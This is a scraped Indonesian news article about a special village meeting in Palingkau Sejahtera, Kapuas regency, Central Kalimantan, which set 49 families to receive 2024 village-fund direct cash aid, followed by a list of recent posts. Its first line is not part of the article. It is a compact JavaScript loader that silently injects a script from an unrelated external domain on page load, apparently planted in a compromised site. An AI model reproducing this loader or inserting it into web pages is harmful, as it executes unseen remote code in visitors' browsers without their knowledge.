(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Musdesus Palingkau Sejahtera Tetapkan Warga Penerima BLT Dana Desa 2024


KANALKALIMANTAN.COM, KUALA KAPUAS – Pemerintah Desa Palingkau Sejahtera melaksanakan Musyawarah Desa Khusus (Musdesus) untuk menetapkan Keluarga Penerima Manfaat Bantuan Langsung Tunai Dana Desa (KPM BLT DD) tahun anggaran 2024.

Musdesus digelar di kantor Desa Palingkau Sejahtera, Kecamatan Kapuas Murung, Kabupaten Kapuas, Kalteng, Kamis (29/2/2024).

Kepala Desa Palingkau Sejahtera Patah Rahman mengatakan bahwa regulasi untuk program BLT DD tahun 2024 sekurang-kurang 25 % dari anggaran Dana Desa Palingkau Sejahtera tahun 2024.

Baca juga: Produk Kriya Rotan Merah HSU Menarik Hati Pengunjung INACRAFT 2024

“Adapun kriteria penerima BLT DD seperti kepala keluarga yang kehilangan mata pencaharian, mempunyai anggota keluarga yang rentan atau sakit menahun, tidak ada menerima bantuan sosial dari pemerintah, rumah tangga dengan KK tunggal, serta perempuan dari kepala keluarga miskin,” paparnya.

Kades berharap kegiatan Musdesus ini dapat menentukan jumlah calon KPM BLT DD tahun 2024 Desa Palingkau Sejahtera menyasar KPM yang sesuai dengan regulasi dan peraturan yang ada.

“Ada rambu-rambu yang harus kita patuhi untuk menetapkan penerima BLT DD ini, kalau maunya kita berikan rata kepada semua warga kurang mampu, tetapi aturan dari pemerintah tidak bisa kita langgar. Semoga musyawarah ini dapat menghasilkan keputusan bersama untuk penetapan KPM BLT DD Desa Palingkau Sejahtera tahun 2024,” beber Kades Patah Rahman.

Baca juga: Produk UMKM Binaan Dekransda Banjarbaru Mejeng di INACRAFT 2024

Pendamping Desa Palingkau Sejahtera Abdul Fattah Birrizqy  berharap penerima BLT DD Tahun 2024 Desa Palingkau Sejahtera benar-benar sesuai dengan kriteria yang ditetapkan pemerintah.

“Melalui Musdesus ini, maka diharapkan manfaat Program BLT DD benar benar tepat sasaran dan tidak melanggar peraturan,” ujarnya.

Di tempat yang sama, Ketua BPD Palingkau Sejahtera Marlin menyampaikan harapan untuk penetapan KPM BLT DD Desa Palingkau Sejahtera dapat mengkover warga yang berhak mendapatkan BLT DD.

“Sehingga BLT DD Desa Palingkau Sejahtera nantinya tepat sasaran dan dapat membantu warga yang benar-benar membutuhkan bantuan dari pemerintah sesuai dengan syarat dan regulasi yang ada,” ucapnya.

Baca juga: Penumpang Bawa Kabur Motor Tukang Ojek, MK Ditangkap Polsek Banjarmasin Barat

Dalam Musdesus, akhirnya menetapkan sebanyak 49 KPM BLT DD Desa Palingkau Sejahtera tahun 2024. (Kanalkalimantan.com/ags)

Reporter: ags
Editor: kk


Risa

Recent Posts

Analis Minta Pemerintah Terbuka dan Jujur soal Tapera Potong Gaji Pekerja

KANALKALIMANTAN.COM, JAKARTA - Direktur Eksekutif Prakarsa, Ah Maftuchan, mengatakan pemerintah seharusnya bisa lebih terbuka dan… Read More

1 jam ago

Peringati Hari Lahir Pancasila, Ini Pesan Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semarak warna dan semangat cinta Tanah Air dalam peringatan Hari Lahir Pancasila… Read More

2 jam ago

Parade Hari Lahir Pancasila di Depan Balai Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Ratusan pelajar, anggota TNI, Polri, dan pegawai di lingkungan Pemerintah Kota (Pemko)… Read More

2 jam ago

27 Anggota Purna Paskibraka 2023 Dikukuhkan

KANALKALIMANTAN.COM, MARTAPURA - Mewakili bupati Banjar, Kepala Badan Kesatuan Bangsa dan Politik (Kesbangpol) Kabupaten Banjar… Read More

2 jam ago

Satgas TMMD Penyuluhan ke Pelajar SMKN 2 Amuntai

KANALKALIMANTAN.COM, AMUNTAI - Satuan Tugas (Satgas) TNI Manunggal Membangun Desa (Satgas TMMD) ke-120 Kodim 1001/HSU-Balangan… Read More

2 jam ago

Dandim 1006 Banjar Pimpin Upacara Peringatan Hari Lahir Pancasila 2024

KANALKALIMANTAN.COM, MARTAPURA - Komandan Distrik Militer (Dandim) 1006 Letkol Kav Zulkifer Sembiring bertindak sebagai Inspektur… Read More

3 jam ago

This website uses cookies.